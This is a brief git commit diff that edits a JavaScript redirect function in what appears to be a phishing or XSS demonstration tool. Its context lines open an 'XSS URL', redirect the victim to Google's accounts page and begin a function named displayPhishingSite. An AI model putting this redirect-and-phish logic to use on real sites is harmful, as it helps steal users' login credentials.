This commit is contained in:
Parag Jyoti Pal
2021-02-11 12:10:49 +05:30
parent 845b2db255
commit 2d19294540

View File

@@ -34,7 +34,7 @@ function redirect(){
window.open(theXssUrl);
window.focus();
}
window.location = "https://accounts.google.com/ServiceLoginAuth";
window.location = "https://accounts.google.com/";
}
function displayPhishingSite(){